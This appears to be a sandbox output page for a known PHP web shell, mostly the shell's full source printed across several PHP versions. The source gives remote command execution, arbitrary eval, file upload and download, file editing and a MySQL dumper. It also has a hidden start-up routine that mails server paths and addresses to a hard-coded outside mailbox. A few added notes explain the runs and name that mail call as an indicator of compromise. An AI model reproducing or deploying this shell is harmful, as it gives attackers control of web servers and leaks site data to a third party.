fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' 
now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Warning: Undefined variable $user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Warning: Undefined variable $passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Warning: Undefined variable $host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Warning: Undefined variable $db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Warning: Undefined variable $query in /in/avLYS on line 448 Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Warning: Undefined variable $db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? 
$mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
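Output for 8.0.0 - 8.0.12, 8.0.14 - 8.0.30
Note: the text below is mostly the script's own source. The `<? ... ?>` blocks are printed rather than run, which suggests the short open tag is not enabled on these builds. Only the `<?= ... ?>` expressions are evaluated, and they raise "Undefined variable" warnings because the assignments in the unexecuted blocks never ran. None of the shell's handlers (command, file, eval, MySQL) execute in this output.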
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 
'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? 
} break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Warning: Undefined variable $cmd in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? 
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' 
type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; 
filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' 
now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Warning: Undefined variable $user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Warning: Undefined variable $passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Warning: Undefined variable $host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Warning: Undefined variable $db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Warning: Undefined variable $query in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Warning: Undefined variable $db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? 
$mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
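Output for 8.0.13
Note: on this build the file is parsed as PHP, and compilation stops at the curly-brace string offset (`$work_dir{...}`) on line 105, so no part of the script runs.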
Fatal error: Array and string offset access syntax with curly braces is no longer supported in /in/avLYS on line 105
Process exited with code 255.
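Output for 7.4.33
Note: here the script does execute. The `mail()` and `shell_exec()` warnings show the sandbox refusing two actions the script takes at start-up: the e-mail that reports the server's document root, script path and addresses to a hard-coded mailbox, and the `id` command. The directory listing of `/` is still produced. That start-up `mail()` call, with its `sh-<number>` subject, is a useful indicator when checking a host or its mail log for this file.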
Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 105 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 105 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 237 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 237 Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit 
onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 126B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 126B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 10686B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a 
href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 400B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 408B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | --------- 40B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 60B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 1294B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 1294B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> Notice: Trying to access array offset on value of type bool in 
/in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | r-xr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | --------- 40B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxrwxrwx 80B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 10686B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 14B Sep 10 2014 15:49:46 <a href='#' 
onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | r-xr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxrwxrwx 120940B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 70B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 96B Sep 10 2014 15:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.2.29 - 7.2.33, 7.3.16 - 7.3.31, 7.4.0 - 7.4.32
